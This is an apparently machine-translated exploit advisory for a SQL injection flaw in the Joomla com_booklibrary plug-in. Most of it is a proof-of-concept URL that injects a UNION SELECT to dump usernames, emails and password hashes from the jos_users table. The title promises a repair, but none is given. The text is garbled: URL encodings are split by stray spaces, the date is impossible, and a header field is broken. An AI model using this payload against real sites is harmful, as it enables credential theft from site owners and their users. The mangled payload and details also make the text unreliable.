Joomla com_booklibrary plug-in SQL injection vulnerability and repair

Com_booklibrary is a Joomla plug-in. com_booklibrary has the SQL injection vulnerability, which may cause sensitive information leakage.

[+] Info:
~~~~~~~~~

# Exploit Title: SQL Injection in component com_booklibrary for Joomla
# Date: [172.163.2011]
# Author: [Marc Doudiet]
# Software Link: [release
# Version: [Version 2.0 for Joomla 1.5]
# Tested on: [PHP Mysql]

[+] Poc:
~~~~~~~~~

PoC (show the hash of the table jos_users ):
http://xxx.xxx.xxx.xxx/index.php?searchtext=%%20OR%20LOWER (B. bookid) % 20 LIKE % 20% a % 20OR % 20 LOWER (B. isbn) % 20 LIKE % 20% a % 20OR % 20 LOWER (B. title) % 20 LIKE % 20% a % 20OR % 20 LOWER (B. manufacturer) % 20 LIKE % 20% a % 20OR % 20 LOWER (B. comment) % 20 LIKE % 20% a %) % 20AND % 20b. published = 1% 20AND % 20b. approved = 1% 20AND % 20b. archived = 0% 20 UNION % 20 SELECT %, username, email, password, 6, 7, 8, 9, 10, 11, 12, 13, 16, 17, 18, 19, 20, 21, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33% 20 FROM % 20jos_users % 20 UNION % 20 SELECT % 20b. *, % 20blr2. rating2, % 20c. title % 20AS % 20category_titel, c. id % 20AS % 20 catid, % 20c. ordering % 20AS % 20category_ordering % 20 FROM % 20jos_booklibrary % 20AS % 20b % 20 LEFT % 20 JOIN % 20jos_booklibrary_categories % 20AS % 20bc % 20ON % 20bc. bookid % 20 = % 20b. id % 20 LEFT % 20 JOIN % 20jos_categories % 20AS % 20c % 20ON % 20bc. catid % 20 = % 20c. id % 20 LEFT % 20 JOIN % 20 (% 20 SELECT % 20 ROUND (avg (blr1.rating) % 20AS % 20rating2, % 20fk_bookid % 20 FROM % 20jos_booklibrary % 20AS % 20bl % 20 LEFT % 20 JOIN % 20jos_booklibrary_review % 20AS % 20blr1% 20ON % 20blr1. fk_bookid % 20 = % 20bl. id % 20 GROUP % 20BY % 20blr1. fk_bookid % 20) % 20blr2% 20ON % 20blr2. fk_bookid % 20 = % 20b. id % 20 WHERE % 20 (LOWER (B. authors) % 20 LIKE % 20% & catid = 0 & option = com_booklibrary & task = search & Itemid = 53 & author = true & title = true & isbn = true

& Description = true & publisher = true & bookid = true